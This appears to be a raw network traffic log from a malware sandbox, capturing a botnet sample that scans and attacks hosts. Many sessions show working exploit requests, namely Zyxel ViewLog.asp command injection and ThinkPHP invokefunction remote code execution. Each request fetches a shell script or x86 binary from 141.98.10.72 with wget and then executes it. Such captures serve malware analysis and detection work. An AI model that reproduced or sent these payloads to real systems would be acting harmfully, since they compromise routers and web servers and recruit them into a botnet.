                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      592192.168.2.153621062.232.130.1708080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:17.318619013 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      593192.168.2.155409894.123.62.2488080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:17.365114927 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      594192.168.2.154752831.200.48.548080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:17.365259886 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      595192.168.2.153725694.123.54.2518080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:17.366324902 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      596192.168.2.154779831.136.120.588080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:17.539943933 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:18.232897997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:19.576783895 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:22.360661030 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:27.736474991 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:38.488404989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:01.783591032 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:44.790559053 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      597192.168.2.1551256119.29.120.22223
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:17.587636948 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:48Auth Result: ????.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      598192.168.2.154661694.120.11.2498080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:17.613161087 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      599192.168.2.154409231.200.108.288080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:17.614300966 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      600192.168.2.1551278119.29.120.22223
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:18.302009106 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:49Auth Result: ????.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      601192.168.2.153784688.212.218.1880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:19.189344883 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:19.424259901 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:19 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      602192.168.2.155044088.84.219.10380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:19.190524101 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:19.443593979 CET78INHTTP/1.1 400 Bad Request
                                                      Content-Length: 0
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      603192.168.2.155308095.138.144.21780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:19.384540081 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:19.578082085 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:19 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      604192.168.2.154394095.111.242.7980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:19.400441885 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:19.610574007 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:19 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      605192.168.2.155867295.216.41.5280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:19.416264057 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:19.641463041 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:19 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      606192.168.2.156029095.158.24.6480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:19.417836905 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      607192.168.2.154339095.163.217.7380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:19.421155930 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:19.651289940 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:19 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      608192.168.2.154784895.165.230.1080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:19.435955048 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:19.681387901 CET516INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Content-Length: 349
                                                      Connection: close
                                                      Date: Wed, 14 Feb 2024 08:30:17 GMT
                                                      Server: lighttpd/1.4.31
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      609192.168.2.156095488.174.163.10680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:19.606172085 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      610192.168.2.153981888.99.97.11680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:19.609725952 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:19.819387913 CET321INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.25.2
                                                      Date: Wed, 14 Feb 2024 08:30:19 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
